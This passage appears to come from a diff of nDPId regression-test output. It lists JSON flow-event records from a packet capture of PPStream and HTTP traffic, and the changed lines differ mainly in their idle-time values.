-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7560000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1083,"flow_tot_l4_payload_len":10732,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1467353136433,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":34577,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00789{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7440000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": 
{"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 